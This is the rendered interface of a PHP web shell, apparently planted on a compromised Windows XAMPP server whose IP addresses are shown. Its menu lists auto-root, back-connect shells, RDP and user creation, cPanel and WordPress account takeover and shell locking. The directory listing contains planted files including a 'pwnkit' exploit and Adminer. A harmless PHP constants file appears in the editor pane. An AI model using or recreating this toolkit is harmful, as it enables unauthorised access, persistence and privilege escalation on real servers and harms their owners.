Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
calendar_const_exceptions.php
2.79
KB
-rw-rw-rw-
calendar_func_exceptions.php
2.64
KB
-rw-rw-rw-
class_exceptions.php
519
B
-rw-rw-rw-
compatinfo.bat
520
B
-rwxrwxrwx
configure.php
16.52
KB
-rw-rw-rw-
constant_exceptions.php
565
B
-rw-rw-rw-
date_class_exceptions.php
802
B
-rw-rw-rw-
date_const_exceptions.php
1.92
KB
-rw-rw-rw-
date_func_exceptions.php
2.58
KB
-rw-rw-rw-
exceptions.conf.php
4.37
KB
-rw-rw-rw-
ftp_const_exceptions.php
1.09
KB
-rw-rw-rw-
function_exceptions.php
10.85
KB
-rw-rw-rw-
gd_const_exceptions.php
1.14
KB
-rw-rw-rw-
gd_func_exceptions.php
1.31
KB
-rw-rw-rw-
gettext_func_exceptions.php
1.77
KB
-rw-rw-rw-
gmp_const_exceptions.php
767
B
-rw-rw-rw-
hash_func_exceptions.php
1.1
KB
-rw-rw-rw-
iconv_const_exceptions.php
1.07
KB
-rw-rw-rw-
iconv_func_exceptions.php
845
B
-rw-rw-rw-
internal_const_exceptions.php
3.63
KB
-rw-rw-rw-
libxml_func_exceptions.php
1.3
KB
-rw-rw-rw-
mysql_const_exceptions.php
1.08
KB
-rw-rw-rw-
mysqli_const_exceptions.php
892
B
-rw-rw-rw-
openssl_const_exceptions.php
2.73
KB
-rw-rw-rw-
pci.php
491
B
-rw-rw-rw-
pciconf.bat
511
B
-rwxrwxrwx
pcre_const_exceptions.php
1.71
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
spl_func_exceptions.php
1.25
KB
-rw-rw-rw-
standard_class_exceptions.php
730
B
-rw-rw-rw-
standard_const_exceptions.php
1.99
KB
-rw-rw-rw-
standard_func_exceptions.php
196.83
KB
-rw-rw-rw-
xmlwriter_func_exceptions.php
1.1
KB
-rw-rw-rw-
xsl_const_exceptions.php
1.34
KB
-rw-rw-rw-
zlib_func_exceptions.php
938
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : internal_const_exceptions.php
<?php /** * internal (PHP Core) Constant Exceptions dictionary for PHP_CompatInfo 1.9.0b2 or better * * PHP versions 5 * * @category PHP * @package PHP_CompatInfo * @author Davey Shafik <davey@php.net> * @author Laurent Laville <pear@laurent-laville.org> * @license http://www.opensource.org/licenses/bsd-license.php BSD * @version CVS: $Id: internal_const_exceptions.php,v 1.1 2008/12/28 19:53:22 farell Exp $ * @link http://pear.php.net/package/PHP_CompatInfo * @link http://www.php.net/manual/en/reserved.constants.php * @since version 1.9.0 (2009-01-19) */ $constant_exceptions['internal'] = array ( 'E_RECOVERABLE_ERROR' => array ( 'init' => '5.2.0', 'name' => 'E_RECOVERABLE_ERROR', ), 'E_STRICT' => array ( 'init' => '5.0.0', 'name' => 'E_STRICT', ), 'PHP_DEBUG' => array ( 'init' => '5.2.7', 'name' => 'PHP_DEBUG', ), 'PHP_EOL' => array ( 'init' => '4.3.10', 'name' => 'PHP_EOL', ), 'PHP_EXTRA_VERSION' => array ( 'init' => '5.2.7', 'name' => 'PHP_EXTRA_VERSION', ), 'PHP_INT_MAX' => array ( 'init' => '4.4.0', 'name' => 'PHP_INT_MAX', ), 'PHP_INT_SIZE' => array ( 'init' => '4.4.0', 'name' => 'PHP_INT_SIZE', ), 'PHP_MAJOR_VERSION' => array ( 'init' => '5.2.7', 'name' => 'PHP_MAJOR_VERSION', ), 'PHP_MINOR_VERSION' => array ( 'init' => '5.2.7', 'name' => 'PHP_MINOR_VERSION', ), 'PHP_PREFIX' => array ( 'init' => '4.3.0', 'name' => 'PHP_PREFIX', ), 'PHP_RELEASE_VERSION' => array ( 'init' => '5.2.7', 'name' => 'PHP_RELEASE_VERSION', ), 'PHP_SAPI' => array ( 'init' => '4.2.0', 'name' => 'PHP_SAPI', ), 'PHP_SHLIB_SUFFIX' => array ( 'init' => '4.3.0', 'name' => 'PHP_SHLIB_SUFFIX', ), 'PHP_VERSION_ID' => array ( 'init' => '5.2.7', 'name' => 'PHP_VERSION_ID', ), 'PHP_ZTS' => array ( 'init' => '5.2.7', 'name' => 'PHP_ZTS', ), 'STDERR' => array ( 'init' => '4.3.0', 'name' => 'STDERR', ), 'STDIN' => array ( 'init' => '4.3.0', 'name' => 'STDIN', ), 'STDOUT' => array ( 'init' => '4.3.0', 'name' => 'STDOUT', ), 'UPLOAD_ERR_CANT_WRITE' => array ( 'init' => '5.1.0', 'name' => 'UPLOAD_ERR_CANT_WRITE', ), 'UPLOAD_ERR_EXTENSION' => array ( 'init' => '5.2.0', 'name' => 'UPLOAD_ERR_EXTENSION', ), 'UPLOAD_ERR_FORM_SIZE' => array ( 'init' => '4.3.0', 'name' => 'UPLOAD_ERR_FORM_SIZE', ), 'UPLOAD_ERR_INI_SIZE' => array ( 'init' => '4.3.0', 'name' => 'UPLOAD_ERR_INI_SIZE', ), 'UPLOAD_ERR_NO_FILE' => array ( 'init' => '4.3.0', 'name' => 'UPLOAD_ERR_NO_FILE', ), 'UPLOAD_ERR_NO_TMP_DIR' => array ( 'init' => '4.3.10', 'name' => 'UPLOAD_ERR_NO_TMP_DIR', ), 'UPLOAD_ERR_OK' => array ( 'init' => '4.3.0', 'name' => 'UPLOAD_ERR_OK', ), 'UPLOAD_ERR_PARTIAL' => array ( 'init' => '4.3.0', 'name' => 'UPLOAD_ERR_PARTIAL', ), // @link http://www.php.net/manual/en/language.constants.predefined.php // Magic constants '__CLASS__' => array ( 'init' => '4.3.0', 'name' => '__CLASS__', ), '__FILE__' => array ( 'init' => '4.0.0', 'name' => '__FILE__', ), '__FUNCTION__' => array ( 'init' => '4.3.0', 'name' => '__FUNCTION__', ), '__LINE__' => array ( 'init' => '4.0.0', 'name' => '__LINE__', ), '__METHOD__' => array ( 'name' => '__METHOD__', 'init' => '5.0.0', ), ); ?>
Close